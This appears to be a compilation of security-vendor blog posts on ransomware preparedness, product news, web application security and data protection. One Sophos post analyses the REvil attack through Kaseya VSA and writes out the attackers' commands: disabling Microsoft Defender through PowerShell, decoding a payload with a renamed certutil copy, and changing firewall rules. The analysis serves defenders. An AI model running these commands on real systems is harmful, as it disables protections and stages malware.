Ransomware attacks have all but dominated news headlines in recent weeks. Managed service providers (MSPs) know the risks of ransomware and how important it is to have a plan in place to respond to an attack when they have an impacted client. There are many different factors to consider, but it’s best practice to have a strategy for detection, prevention, and response. We put together a comprehensive infographic on the journey of ransomware and how MSPs can prepare their clients – here’s a preview.

How Can MSPs Prevent Ransomware Attacks?

The reality is, there is no foolproof way to prevent a ransomware attack. Even the most protected and prepared businesses can fall victim to ransomware. However, MSPs can take steps to lower the chances of their SMB clients falling victim to an attack.

Arm clients with antivirus. These tools have been around a long time but are still critical in a ransomware prevention strategy. Automate patch management. When software providers identify bugs, they publish that info and offer a patch. With automated patching, businesses are less susceptible to being exploited by bad actors looking to capitalize on those bugs. Implement tools with ransomware detection capabilities. Often, ransomware attacks can infiltrate a business’s systems, going undetected. One way to drastically improve ransomware prevention is to have tools that identify it before it spreads across a network.

The Journey of Crypto-Ransomware: Detection, Response, and Prevention

In this infographic, we break down how ransomware is spread and share tips to help businesses establish plans to prevent, detect, and respond to ransomware attacks.

Detecting a Ransomware Attack

Ransomware attacks can go undetected, but there are ways to identify if a hacker may have impacted your client. Be sure your clients notify you if they see unusual changes to file names, lockout screens, or a pop-up with a ransom note.

Responding to a Ransomware Attack

If a ransomware attack is detected, it’s important to respond as quickly as possible. First, scan networks to confirm that an attack is underway, and once identified, isolate the infected computer(s) immediately. Immediately secure backup data or systems by taking them offline and ensure backups are free of malware. These are the immediate steps to take when alerted of an attack. From here, MSPs should focus on ensuring hackers can’t get back in.

These are just a few ways to prepare for a ransomware attack and are certainly not a comprehensive list. To learn more about how MSPs can help prevent their SMB clients from falling victim to a ransomware attack, take a look at our infographic, The Journey of Crypto-Ransomware: Detection, Response, and Prevention.

Source:Datto

The product team is pleased to announce the early access program for SFOS v18.5 MR1 for all Sophos (XG) Firewall devices and all SFOS form factors – XGS Series, XG Series, virtual and software appliances, as well as all supported cloud platforms.

SFOS v18.5 MR1 includes support for new Sophos Central Orchestration capabilities and a number of important security fixes and enhancements.

What’s new in v18.5 MR1

Support for new Central Orchestration subscription (included in the new Xstream Protection license bundle):

• Central SD-WAN VPN Orchestration enables easy point-and-click site-to-site VPN orchestration from Sophos Central – automatically configuring the necessary tunnels and firewall access rules for your desired SD-WAN overlay network.
• Central Firewall Reporting Advanced with 30-days of data retention for full multi-firewall reporting in Sophos Central with access to all pre-packaged reports, plus flexible custom report capabilities and the option to save, schedule, or export your reports.
• Sophos MTR/XDR connector to enable Sophos Firewall intelligence and data to be used as part of our 24/7 Managed Threat Response service, or as part of your self-managed, cross-product extended detection and response solution.

Get the full details on Central Orchestration and how to take advantage of it.

Additional enhancements:

• Resolved FragAttack vulnerabilities recently discovered in the Wi-Fi specification for all internal and add-on Wi-Fi modules for Sophos (XG) Firewall desktop series appliances. All other updates will follow as outlined in this advisory.
• Enhanced backup/restore support improves backup/restore operations across different models by better mapping the management ports. v18.5 MR1 can also restore backups from v18 MR5 and earlier, including any older v17.5 MRs.
• XGS Series reset button enables a long press of the hardware reset button on XGS Series appliances (XGS 116 and higher models) to perform a factory reset to help recover from a bad configuration.
• VPN tunnel logging adds improved logging of VPN tunnel flap events and IPsec IKEv2 rekeying.
• Sophos DDNS (myfirewall.com) will be discontinued and no longer supports new registrations. This is planned from January 31, 2022. Refer to KBA-41764 for more details.

How to get early access and provide feedback

This release is available for early access to all Sophos (XG) Firewall devices: XGS Series, XG Series, virtual, cloud, and all supported platforms running SFOS.

Get the full details and download links here.

You can provide early access feedback directly to the product team using the new and improved in-product feedback mechanism introduced with v18.5. Simply click the feedback link at the top right of the web console UI. Alternatively, you can provide your feedback via the community.

This release is expected to be generally available and rolled out automatically to all customer devices starting in early August.

Source: Sophos

Sophos acquired Capsule8. “I’m excited to share that Sophos has acquired Capsule8, a pioneer and market leader of runtime visibility, detection and response for Linux production servers and containers covering both on-premises and cloud workloads” said Dan Schiappa, Chief Product Officer at Sophos.

Sophos already protects more than two million servers for over 85,000 customers worldwide. Comprehensive server protection is a crucial component of any effective cybersecurity strategy. This deal expands our portfolio of Detection and Response Solutions and Services for underprotected server and cloud environments. It’s great news for anyone looking for a strong and lightweight layer of Linux security with strategically important visibility and detection for their servers and containers, and for organizations who want a single vendor for end-user compute and server workloads.

Linux servers: A growing vector of attack

Use of cloud platforms has grown considerably over recent years, and the pandemic further accelerated the move from on premises servers to cloud-based server workloads. With Linux now the dominant operating system for server workloads, it’s easy to understand why adversaries are adapting and customizing their approach to attack these systems.

SophosLabs threat intelligence reveals that adversaries are designing tactics, techniques and procedures (TTPs) aimed specifically at Linux systems, often exploiting server software as the initial entry point in their attack. Having a strong layer of Linux security is essential in defending against these attacks.

Extending Sophos protection

Our engineering team is already busy planning the integration of Capsule8 technology into our Adaptive Cybersecurity Ecosystem (ACE). We will also feature Capsule8 technology in our Extended Detection and Response (XDR) solutions, Intercept X server protection products, and Sophos Managed Threat Response (MTR) and Rapid Response services.

Capsule8 technology will provide new Linux telemetry and event information, further enhancing Sophos’ data lake with additional context for advanced threat hunting, security operations and customer protection practices. It also strengthens the ability of Sophos MTR operators and customers using Sophos XDR to find and neutralize suspicious activity before it becomes malicious.

The addition of the Capsule8 technologies to the Sophos portfolio is an exciting time for all of us at Sophos and I look forward to sharing further details of the integration later this year.

In the meantime, on behalf of Sophos I’d like to extend a warm welcome to the Capsule8 employees, customers and partners; we’re delighted to be working with you.

Source: Sophos

In the cybersecurity world, it’s only natural to balance risks and security measures. After all, there is no way to achieve absolute security and therefore you have to say stop somewhere. However, if you rely on excuses and underestimate the threats, you’re very likely to become a victim of a serious attack. Cybercriminals are smart – they attack those who make it easy for them.

I’ve seen businesses treat web application security as less important than, for example, having an antivirus. I can understand such an approach if a business just has a simple marketing site on WordPress. However, I cannot get my head around such carelessness if the business develops professional B2B web applications for huge corporations, which use these web applications to process tons of sensitive information! And yet, yes, this happens!

Here are some of the excuses that I’ve heard when it comes to web application security. I’m including them to help you avoid similar pitfalls when you decide how to proceed with your journey.

“Our software is only for internal use so there’s no attack risk”

The assumption that malicious hackers only attack web applications that are exposed to the public is one of the primary reasons for major data breaches. Not only are inside jobs quite common in the world of cybersecurity but attackers can find a way into the internal network and access internal web applications from there.

You should always treat the security of your web applications the same way no matter whether they are exposed to the public, used through internal networks and VPNs only, or protected by IP filtering and authentication. That means that, for example, if your application is accessible only from a selected range of IPs and requires authentication, it doesn’t mean it’s secure by design. Even worse, criminals may actually seek entry into such applications, in particular, knowing that their creators often treat vulnerabilities as less of a threat and therefore do not even check for them.

In conclusion, scan every application for security vulnerabilities, no matter how well it is protected by network security measures and authentication!

“Our implementation makes it impossible to have vulnerabilities”

I’ve heard this argument from a company, which uses Hibernate ORM for its Java development. The construction of Hibernate supposedly eliminates SQL injection vulnerabilities because the database always returns a single result set. Unfortunately, that is not true. Only some SQL injection attacks are eliminated by this feature of Hibernate but not all of them. This feature also has no impact whatsoever on vulnerabilities that are not related to SQL.

While modern development and implementation environments make some attacks more difficult, there is no environment that can help you prevent all of them – or even a majority of them. If you think that the way that you designed your development and implementation is enough without any security testing included, think again.

In conclusion, test all your applications for security vulnerabilities no matter what development and implementation environments you use (even if they supposedly eliminate security errors).

“We run a security scan once in a while and we never found anything serious”

Some businesses believe that it’s enough to scan their applications every few months, for example, only before a major release. They do not see the need to verify the security of each release candidate and are even less keen to include security scanning as part of their regular DevOps pipelines. The argument is that the scans yielded no major problems up to date.

Such an approach may be compared to leaving your car door unlocked (and your keys in the ignition) in front of the supermarket. Sure, in the majority of cases, nothing will happen because there will be no car burglars around. However, if just one burglar is around and notices that your car is not locked, your vehicle will change its owner pretty quickly. Same in this case: just one major vulnerability that goes undetected between major releases may result in a security breach exposing all your sensitive data and ruining your business reputation.

In conclusion, test your supposedly safe applications even more thoroughly than the ones you’d think are unsafe.

Better safe than sorry

The phrase “better safe than sorry” is very applicable for cybersecurity (and security in general). In my opinion, whatever security decisions you make for your business, you should compare these with the security of your own personal assets. For example, if your apartment is in a block with security at the front door, does it mean you can leave your door unlocked? If no break-in happened in your neighborhood recently, does it mean that you can leave your window wide open when you go to work?

If instead of making excuses you try to assume the worst scenarios, you are much less likely to be the hero of the next headline news about a data breach. And the cost of including web application security in your SDLC compared to the losses that you could incur as a result of the data breach is just like the cost of a door lock compared to the cost of all the valuables in your home.

Make the right choice, not excuses.

Source: Acunetix

At Invicti, we are absolutely thrilled to be recognized for the first time in the Magic Quadrant for Application Security Testing this year.

Gartner is a leading IT research and advisory firm that helps businesses of all sizes evaluate technology and make informed decisions. We feel our acknowledgment in the report is a big deal, especially for a company of our size, and it marks a recognition by Gartner that the application security testing market and technology landscape are evolving. We believe that our approach is at the vanguard of that evolution.

Application security testing is a broad category. It includes everything from software composition analysis (SCA) to static, dynamic, and interactive application security testing. And while traditional SCA and static application security testing (SAST) certainly have their place, especially for taking inventory of open-source components and analyzing source code, a complete security program also requires DAST and IAST.

We are the only vendor in the Magic Quadrant that takes our approach to provide an orchestrated DAST and IAST platform. Invicti Security has intentionally developed Netsparker and Acunetix to uniquely orchestrate DAST and IAST, enabling organizations of all sizes to build a continuous and automated web application security practice.

Our mission is to enable you to vastly improve your security posture with scale and automation, and we do it by delivering unique products. We feel only Invicti – with our DAST, IAST, and dynamic SCA – can cover all of your apps (in development, in production, and even third-party). And only Invicti can do this with the scale, speed, accuracy, and automation you need for your agile (or DevOps) environment.

Bottom line: our intelligent automation, 50+ integrations, and benchmark low rate of false positives make us stand out in a very crowded field of players in application security.

Of course, we’re only getting started. We’ve got lots in store as we continue to innovate on both Netsparker and Acunetix. We look forward to pushing the market to a more modern and scalable approach to application security.

Interested parties can access the full 2021 Gartner Magic Quadrant for Application Security Testing here.

Source: Acunetix

On July 2, while many businesses had staff either already off or preparing for a long holiday weekend, an affiliate of the REvil ransomware group launched a widespread crypto-extortion gambit.  Using an exploit of Kaseya’s  VSA remote management service, the REvil actors launched a malicious update package that targeted customers of managed service providers and enterprise users of the on-site version of Kaseya’s VSA remote monitoring and management platform.

REvil is a ransomware-as-a-service (RaaS), delivered by “affiliate” actor groups who are paid by the ransomware’s developers. Customers of  managed service providers have been a target of REvil affiliates and other ransomware operators in the past, including a ransomware outbreak in 2019 (later attributed to REvil) that affected over 20 small local governments in Texas.  And with the decline of several other RaaS offerings, REvil has become more active. Its affiliates have been exceedingly persistent in their efforts as of late, continuously working to subvert malware protection. In this particular outbreak, the REvil actors not only found a new vulnerability in Kaseya’s supply chain, but used a malware protection program as the delivery vehicle for the REvil ransomware code.

REvil’s operators posted to their “Happy Blog” today, claiming that more than a million individual devices were infected by the malicious update. They also said that they would be willing to provide a universal decryptor for victims of the attack, but under the condition that they be paid $70,000,000 worth of BitCoin.

Managed Malware Delivery

The outbreak was delivered via a malicious update payload sent out to VSA servers, and in turn to the VSA agent applications running on managed Windows devices. It appears this was achieved using a zero-day exploit of the server platform. This gave REvil cover in several ways: it allowed initial compromise through a trusted channel, and leveraged trust in the VSA agent code—reflected in anti-malware software exclusions that Kaseya requires for set-up for its application and agent “working” folders. Anything executed by the Kaseya Agent Monitor is therefore ignored because of those exclusions—which allowed REvil to deploy its dropper without scrutiny.

The Kaseya Agent Monitor (at C:PROGRAM FILES (X86)KASEYA<ID>AGENTMON.EXE, with the ID being the identification key for the server connected to the monitor instance) in turn wrote out the Base64-encoded malicious payload AGENT.CRT to the VSA agent “working” directory for updates (by default, C:KWORKING). AGENT.CRT is encoded to prevent malware defenses from performing static file analysis with pattern scanning and machine learning when it is dropped.These technologies normally work on executable files (though, as we’ve noted, since this file was deployed within the “working” directory excluded under Kaseya’s requirements, this would not likely have come into play.)

After deploying the payload, the Kaseya agent then ran the following Windows shell commands, concatenated into a single string:

Here’s a breakdown of what’s going on here:

 ping 127.0.0.1 -n 5693 > nul 

The first command is essentially a timer. The PING command has a -n parameter which instructs the Windows PING.EXE tool to send echo requests to the localhost (127.0.0.1)—in this case, 5,693 of them. This acted as a “sleep” function, delaying the subsequent PowerShell command for 5,693 seconds—roughly 94 minutes. The value 5,693 varied per victim, indicating that the number was randomly generated on each VSA server as part of the agent procedure that sent the malicious command down to victims.

C:WindowsSystem32WindowsPowerShellv1.0powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

The next part of the command string is a PowerShell command that attempts to disable core malware and anti-ransomware protections offered by Microsoft Defender:

• Real-time protection
• Network protection against exploitation of known vulnerabilities
• Scanning of all downloaded files and attachments
• Scanning of scripts
• Ransomware protection
• Protection that prevents any application from gaining access to dangerous domains that may host phishing scams, exploits, and other malicious content on the Internet
• Sharing of potential threat information with Microsoft Active Protection Service (MAPS)
• Automatic sample submission to Microsoft

These features are turned off to prevent Microsoft Defender from potentially blocking subsequent malicious files and activity.

copy /Y C:WindowsSystem32certutil.exe C:Windowscert.exe 

This creates a copy of the Windows certificate utility, CERTUTIL.EXE—a frequently used Living-Off-the-Land Binary (LOLBin), capable of downloading and decoding web-encoded content. The copy is written to C:WINDOWSCERT.EXE.

echo %RANDOM% >> C:Windowscert.exe

This appends a random 5-digit number to the end of the copied CERTUTIL. This may have been an attempt to prevent anti-malware products that watch for CERTUTIL abuse from recognizing CERT.EXE as a CERTUTIL copy by signature.

C:Windowscert.exe -decode c:kworkingagent.crt c:kworkingagent.exe

The copied CERTUTIL is used to decode the Base64-encoded payload file AGENT.CRT and write it to an executable, AGENT.EXE, in the Kaseya working folder.  AGENT.EXE has a valid Authenticode, signed with a certificate for “PB03 TRANSPORT LTD.” We have only seen this certificate associated with REvil malware; it may be stolen or fraudulently obtained. AGENT.EXE contains a compiler timestamp of July 1, 2021 (14:40:29) – a day before the attack.

del /q /f c:kworkingagent.crt C:Windowscert.exe  

The original payload file C:KWORKINGAGENT.CRT and the copy of CERTUTIL are deleted.

c:kworkingagent.exe

Finally, AGENT.EXE is started by Kaseya’s AGENTMON.EXE process (inheriting its system-level privilege)—and the actual dropping of ransomware begins.

Side-loading for stealth

AGENT.EXE dropped an unexpected file: MSMPENG.EXE, an outdated and expired version of Microsoft’s Antimalware Service executable. This is a benign yet vulnerable application from Windows Defender, version 4.5.218.0, signed by Microsoft on March 23, 2014:

This version of MSMPENG.EXE is vulnerable to side-loading attacks—and we’ve seen this particular version of the application abused before. In a side-load attack, malicious code is put into a dynamic link library (DLL) named to match one required by the targeted executable, and usually placed into the same folder as the executable so it is found before a legitimate copy.

In this case, AGENT.EXE dropped a malicious file named MPSVC.DLL alongside the MSMPENG.EXE executable. AGENT.EXE then executes MSMPENG.EXE, which detects the malicious MPSVC.DLL file and loads it into its own memory space.

The MPSVC.DLL also contains the “PB03 TRANSPORT LTD.” certificate that was applied to AGENT.EXE. The MPSVC.DLL appears to have been compiled on Thursday July 1, 2021 (14:39:06), just prior to the compilation of AGENT.EXE.

From that moment on, the malicious code in MPSVC.DLL hijacks the normal execution flow of the Microsoft branded process, when MSMPENG.EXE calls the ServiceCrtMain function in the malicious MPSVC.DLL (this is also the main function in a benign MPSVC.DLL):

The MSMPENG.EXE, now under control of the malicious MPSVC.DLL, begins to encrypt the local disk, connected removable drives and mapped network drives, all from a Microsoft signed application that security controls typically trust and allow to run unhindered.

From here on out, this REvil ransomware is technically very similar to other recent REvil extortion operations. It executes a NetShell (netsh) command to change firewall settings to allow the local Windows system to be discovered on the local network by other computers (netsh advfirewall firewall set rule group=”Network Discovery” new enable=Yes ). Then it begins encrypting files.

The REvil ransomware performs an in-place encryption attack, and so the encrypted documents are stored on the same sectors as the original unencrypted document, making it impossible to recover the originals with data recovery tools. REvil’s efficient file system activity shows specific operations, performed on dedicated threads:

The ransomware  runs storage access (the reading of original documents and writing of encrypted document), key-blob embedding, and document renaming on multiple individual threads for doing faster damage. As each file is encrypted,  a random extension is added to the end of its name.

A ransom note is dropped using the same random extension as part of the filename (for example, “39ats40-readme.txt”.)

There are some factors that stand out in this attack when compared to others. First, because of its mass deployment, this REvil attack makes no apparent effort to exfiltrate data. Attacks were customized to some degree based on the size of the organization, meaning that REvil actors had access to VSA server instances and were able to identify individual customers of MSPs as being different from larger organizations. And there was no sign of deletion of volume shadow copies—a behavior common among ransomware that triggers many malware defenses.

Here’s a video demonstrating how the attack works:

Lessons learned

The tactics to evade malware protection used here—poisoning a supply-chain well, taking advantage of vendor carve-outs from malware protection, and side-loading with an otherwise benign (and Microsoft-signed) process—are all very sophisticated. They also show the potential risks of excluding anti-malware protection from folders where automated tasks write and execute new files. While zero-day supply-chain exploits are rare, we’ve already seen two major systems management platforms exploited in the past year. While Sunburst was apparently a state-funded attack, ransomware operators clearly have the resources to continue to acquire additional exploits.

Even so, the anti-malware evasion used by this REvil attack was not unstoppable, and was detected by a number of antimalware products. The REvil payload itself was detectable by Sophos as Mal/Generic-S by Intercept X, and Troj/Ransom-GIP and Troj/Ransom-GIS, as well as HPmal/Sodino-A in on-premises protection products. The REvil-specific code certificate is also detected as Mal/BadCert-Gen. While the protection exclusions may have allowed the REvil dropper to be installed on machines, the ransomware itself was detected. Intercept X’s cryptoransomware protection feature is not constrained by folder exclusions, and would block file encryption anywhere on protected drives.

Source: Sophos

Addressing an organization’s data security challenges requires some heavy lifting – no question about it. Whether data security worries center around internal security lapses or stem from the harsh reality of being targeted by those with malicious intent, organizations face a constant need to be on the alert and protective of sensitive data.
Rather than cobble together a piecemeal solution strategy, relying on a trusted solutions provider that offers a suite of integrated, scalable data security solutions can provide relief. Knowing what data needs to be protected, classifying the data, applying controls to the data without slowing down business processes, and sharing all this sensitive data securely can provide IT and security leaders peace of mind.

The Challenge of Gaining Data Visibility

With the massive amount of data exchanged daily, knowing what data exists, where it lives, who can access it, and how it is ultimately sent is critical to organizational data security. The visibility factor is naturally a concern for CISOs, as a recent HelpSystems data security study attests and is square one when it comes to data security and the policies and solutions needed for a proactive security stance.
Diving into true data visibility includes defining policies and procedures, ensuring they are working and being used, and then assessing which technologies can be put in place to help automatically and efficiently bolster the security needed around sensitive data.

The Challenge of Identifying What Data Needs Protection

To keep the flow of business running for mission-critical communications and not throw unnecessary productivity barriers up, it’s important to first address the fact that not all the vast amount of data exchanged is equal and in need of extensive protection.
Organizations implementing a data classification solution that applies markers to only halt the data which meets the level of protection criteria you set can help ensure business keeps running, (minus potential data breaches). Metadata labels allow other security solutions within the environment to understand which data is sensitive and requires further protection along its journey based on the organizational policy set.
With data classification in place, you can identify and sort out what data is sensitive and in need of protection and which is more mundane and shareable without the more nuanced layers of security to streamline secure data exchanges.

The Challenge of Data Protection Efficiency

Many traditional data security solutions end up blocking “safe” data alongside the potentially malicious or harmful data they are meant to stop. These false positives or false negative alerts can quickly spiral out of control, unnecessarily slowing down the flow of business.
These traditional solutions focus on tight control, but at a cost. At some point, the data handcuffs can get too restrictive and the need to share and access easily (and securely) becomes a top priority for productivity. However, protecting data throughout its lifecycle is not a one size fits all process.
Putting an Adaptive Data Loss Protection (A-DLP) solution in place can take organizations beyond the “block everything” mode by going on the defense to detect and prevent unauthorized sharing before any breach occurs. With DLP in place, organizations gain flexibility and can intelligently inspect and sanitize both structured and unstructured (meta) data within emails, files being transferred via web or cloud, and endpoints to ensure the specified security policy is applied automatically.
This flexibility is of particular importance to highly regulated industries and to adhere to data privacy laws such as HIPAA, PCI-DSS, CCPA, GDPR, and more, which specify the level of protection that should surround data at all points in its journey.

The Challenge of Sharing Files Securely and Efficiently

Once data has been classified and sanitized, the challenge of sending it to a third-party or internally must be met. A secure managed file transfer (MFT) solution can rise to the challenge while meeting stringent compliance requirements for end-to-end protection. Automated workflows, as well as auditing and reporting functionality, add increased security and transparency around file transfers large and small. This reduces the human factor risks so often responsible for file transfer errors.
Combining MFT with Adaptive DLP can further ensure that any files sent and received do not contain sensitive data.

The Challenge Remote Work Poses

As organizations reimagine how and where work gets accomplished, a growing number of workers will continue working from wherever is most convenient and at times on their personal devices. While this flexibility is mostly welcomed, it does not come without data security threats. Employees, of course, are among an organization’s most valuable assets, but they also pose some of the biggest risks without education, intelligent technology solutions, and policies and procedures that are easy to follow to ensure data security.

Data is unquestionably more vulnerable with this more flexible work environment and the human factor continues to pose threats. When people are busy, tired, or pressured is when mistakes around securing data tend to be made.

The need to communicate and collaborate securely remains and the risk of exposing sensitive data both within and outside of the organizations grows higher with more user access points and the ad hoc use of non-approved collaboration and file transfer processes.

Organizations need mechanisms that let people work yet have a safety net to protect them (and their employers) from doing the wrong thing data security-wise. With more demand for functionality comes more risk in sharing data with third parties or via the cloud, upping the risk of a data breach or compliance requirement failures.

The Challenge of Managing Multiple Security Solutions

While it’s easy to see that layers of security can help freeze insecure data movement in it tracks, reduce human error risks, and ensure that even hidden sensitive data isn’t inadvertently accessed, managing those layers with multiple vendors can create productivity bottlenecks.
One way to take alleviate pressure on IT staff is to work with a single trusted vendor capable of delivering multiple layers of security for operational simplicity. This can help ensure that your data classification, data loss prevention, and managed file transfer tools are well integrated and scalable. If the elements that make up your data security suite are not easy and intuitive to use, it will lose its effectiveness as the last barrier to employees making a data security error.

Facing Data Security Challenges with a Security Suite

A solid security suite is one flexible enough that it enforces your security policies, rather than force processes into the solution itself. One benefit of employing a suite-style solution is that it can be implemented in modular fashion. You can deploy a single software solution to address today’s specific data security issue and be comfortable knowing you can add additional layers of security as your needs grow and change. In addition, you can take advantage of solution integrations and enjoy economies of scale.

Data security can encompass any one or a combination of these technologies:

Data Classification: Attaches markings to data to trigger encryption policies. There is no need for a separate encryption job when this is employed.

Data Loss Prevention: Enforces compliance policies with data redaction and sanitization of data as it looks for classification tags and removes risks while letting “safe” data pass through. Over-policing of data typically seen with DLP enforcement can be avoided.

Integrated Email Security: Detect, defend against, and deter phishing, business email compromise, and other advanced identity deception email attacks.

Managed File Transfer: Provides a secure platform to more easily share data with trusted individuals and includes automation, auditing, and reporting functionality.

Digital Rights Management: Add a security wrapper around data wherever it travels, and control and revoke access as needed after it leaves your organization.

How Can We Help You Meet Your Data Security Challenges?

Every organization has different data security challenges, requiring a customized approach to how security layers are applied. Let us show you how you can face your data security challenges more easily with help from the suite of data security solutions from HelpSystems.

I’d Like a Security Suite Demo

Source: Boldon James

The term sensitive data exposure means letting unauthorized parties access stored or transmitted sensitive information such as credit card numbers or passwords. Most major security breaches worldwide result in some kind of sensitive data exposure.

Exploiting an attack vector such as a web vulnerability is just the first step that the attacker takes. Further steps usually involve one of three goals: stealing sensitive information, planting malicious software (for example, to attack other targets or enable permanent control/spying), or escalating to other systems (where this choice repeats). Obviously, stealing sensitive information such as credit card data is the most profitable goal for the attacker and most cyberattacks are driven by money, hence sensitive data exposure is the most common attack goal.

Just like it is possible to create software with next to no vulnerabilities, it is also possible to create software that prevents the attacker from accessing sensitive information. Sensitive data exposure is caused by bad design or implementation of computer systems and software as well as misconfiguration of such systems and software.

Defining sensitive data

When you build a web application, you must clearly define what you consider to be sensitive data. While some examples are obvious, like credit card numbers, authentication credentials, or health records, others may not seem so straightforward. Even if a piece of information is to be displayed onscreen by the application, it may still be considered sensitive in transit and storage.

Any type of data that can be considered personal data or private data should be considered sensitive. This means even data such as first and last name, date of birth, or even an email address. Criminals are after such data because they can correlate personal information stolen from other sources to create profiles for identity theft.

Any data related to financials should also be considered sensitive and this does not mean just credit card numbers. For example, bank account numbers, both internal and IBAN, should also be considered sensitive as well as any transaction amounts.

Depending on the industry that your business deals in, some data may be not only considered sensitive but also covered by compliance regulations. Make sure that all that data is secured, both in transit and in storage, otherwise you will lose your compliance.

Sensitive data exposure vulnerabilities in transit

Most websites and web applications nowadays are accessible via secure SSL/TLS connections. Many go as far as enforcing such connections using HTTP strict transport security (HSTS). As a result of this, many web application designers think that it’s safe to transmit sensitive information between the client and the server using clear text.

This mindset is the primary cause of sensitive data exposure in transit. Unfortunately, despite the fact that SSL/TLS provides a high degree of protection, there are cases when a man-in-the-middle attack (MITM) on network traffic is possible. If the attacker somehow manages to access data transmitted between the web application and the user, and this data includes, for example, credit card numbers or clear text passwords, the attack ends up in sensitive data exposure.

Therefore, the best way to protect your web application against sensitive data exposure is never to transmit any sensitive data using clear text and always use cryptographic algorithms to secure them. Note that these should not be weak crypto algorithms because the attacker may store the intercepted data and later attempt to break the encryption using powerful GPUs.

Sensitive data exposure vulnerabilities in storage

Storing sensitive data securely is just as important as transmitting it securely, if not more. If an attacker exploits a vulnerability and gains access to your website or web application, for example, using an SQL injection, they may be able to access the content of your entire database. If any sensitive information is stored in the database without encryption, it’s a guaranteed leak.

When storing sensitive information, using renowned, secure, and strong encryption algorithms is even more important than in the case of transit. A weak algorithm will let the attacker quickly run brute force attacks on the stolen encrypted data and decode the original information.

In addition to strong database encryption, some types of sensitive data need extra protection. For example, passwords that are encrypted or hashed using even the strongest algorithms can be easily broken if the password itself is a weak password. Therefore, avoiding common password vulnerabilities is just as important as encryption or hashing.

Sensitive data exposure vulnerabilities in email

It is shocking to see how many businesses and institutions forget that email is not a secure channel and sensitive data should never be transmitted using this medium. Email connections between the client and the server may be encrypted but the connections between servers are usually done using plain text. The email body is not encrypted, either. And the recipient of the email has no control over how securely their email content is stored or whether it is actually destroyed when the email is deleted client-side.

If your web application sends emails, you should never send any sensitive data in emails and, instead, use the web application itself to present or accept sensitive information. For example, you should never ever send a new password via an email and instead display it for the user on a web page. An institution should also never send any personal and sensitive data in clear text over emails, which is, unfortunately, the way that many government institutions do it in many countries.

Protecting sensitive data

Sensitive data is considered important enough by OWASP (the Open Web Application Security Project) to feature it in the OWASP Top 10 as a separate category. In the 2017 edition, this category was considered the third most important common flaw. We also believe that in the upcoming 2021 OWASP Top 10 this category will only gain in importance. Therefore, you should take great care to protect your sensitive information and avoid sensitive data exposure.

Protecting your sensitive data is really easy as long as you use cryptographic algorithms in transit and in storage along with any side-measures such as, for example, proper key management (so that your keys are as safe as the data itself). In some cases, you don’t even need to transmit or store encrypted data, you can use hash algorithms. Password hashing is the most efficient way to make sure that passwords are never stolen, both in transit and in storage.

Source: Acunetix

Read our new report The IT Security Team: 2021 and Beyond to ascertain the full impact of the pandemic on the IT security teams around the globe.

Based on findings of an individual survey of 5,400 professionals across 30 countries, the report reveals how IT security teams’ cybersecurity experiences changed over the course of 2020 and what this means for the future delivery of IT security.

More work, more learning

With technology a key enabler for dispersed and digital organizations, IT professionals played a vital role in helping organizations to keep going despite the restrictions and limitations necessitated by COVID-19.

At the same time, adversaries were quick to take advantage of the opportunities presented by the pandemic: 61% of IT teams overall reported an increase in the number of cyberattacks targeting their organization over the course of 2020.

It’s therefore not surprising that demand on IT teams grew over the course of 2020. 63% of respondents said their team saw an increase in non-security workload, while 69% experienced an increase in IT security workload.

However, the vast majority of IT teams that faced a rise in cyberattacks (82%) and a heavier security workload (84%) over the course of 2020 also strengthened their security skills and knowledge.

Adversity brought teams together

Despite the challenges created by the pandemic, 52% of the IT teams surveyed said team morale increased during 2020, with those facing the greatest challenges often reporting the greatest increase. For instance, ransomware victims were considerably more likely to have experienced an increase in team morale than those that weren’t hit (60% versus 47%.)

While morale is also likely influenced by external and personal circumstances during the pandemic, these findings suggest that a shared purpose, a sense of value and facing adversity together helped to bond and lift the spirits of IT teams.

The experiences of 2020 have fuelled ambitions for bigger IT teams

Many teams have entered 2021 with plans to increase the size of both in-house and outsourced IT teams, and to embrace the potential of advanced tools and technologies.

The survey found that 68% of IT teams anticipate an increase in in-house IT security staff by 2023, and 56% expect the number of outsourced IT security staff to grow up over the same time frame.

An overwhelming majority (92%) expect Al to help deal with the growing number and/or complexity of threats.

Read the full survey findings

To learn more, including a deep dive into the experiences of different countries and sectors over 2020 and their future IT security delivery plans, read The IT Security Team: 2021 and Beyond survey report.

Source: Sophos

There are many different technologies that drive business for managed service providers (MSPs), but few are more important than professional services automation (PSA) and remote monitoring and management (RMM) tools used to run their core business of delivering IT managed services.

MSPs have a lot on their plate, from managing client relationships, growing sales pipeline, keeping endpoints up to date and secure, and resolving tickets quickly. To grow their business, it’s critical to effectively utilize business management tools like PSA and RMM to drive efficiency, insight, client satisfaction–and ultimately, profitability. So for MSPs, selecting the right vendor for these tools is an important decision.

Canalys MSP Tech Stack Report

Canalys, a third-party analyst firm focused on the MSP channel, recently debuted their annual MSP Tech Stack Report assessing the performance and momentum of global PSA and RMM vendors. Of the 17 vendors analyzed in the report, Datto was given the highest combined Momentum and Performance score, along with placement in the ‘Strategic’ category, indicating a dedication to the development of our solutions and technological capability.

In order to be recognized as a strategic vendor for RMM and PSA, vendors needed to demonstrate strong technological capabilities and illustrate investment and ambition for continued growth. Vendors in this category also needed to display solid work in product development and technological capability, acquisitions to broaden their portfolio, and deliver training to provide MSPs with the skills necessary to help customers with their IT assets.

Driving efficiency and insight through integrated, MSP-centric solutions

Datto has a unique combination of demonstrated performance based on key metrics and strong future opportunities as defined by our technological capabilities, strategy, and open ecosystem. This enables Autotask PSA and Datto RMM to help MSPs deliver efficient, high-quality managed services for the IT environments of today, and prepare for those of tomorrow.

Datto Autotask PSA and RMM are secure, reliable, and intuitive cloud-based platforms designed to help MSPs run their IT managed services business more efficiently. The seamless integration between the two platforms can help elevate MSPs to higher levels of insight, productivity, and profitability with easy navigation between platforms and relevant real-time asset data and actions providing clear insight into your managed estate. This integration enables MSPs to mitigate issues before they occur, shave minutes off each ticket, and unlock new business opportunities.

“We are excited about being ranked as the highest combined scoring vendor in the RMM and PSA space by Canalys,” said Radhesh Menon, Chief Product Officer at Datto. “Being recognized as a ‘strategic’ vendor validates our focus on innovating to help our partners grow their business with secure and easy-to-use platforms that help drive efficiency, actionable insights, and profitability.”

To learn more about the PSA and RMM vendor landscape, download the report today.

Source: Datto

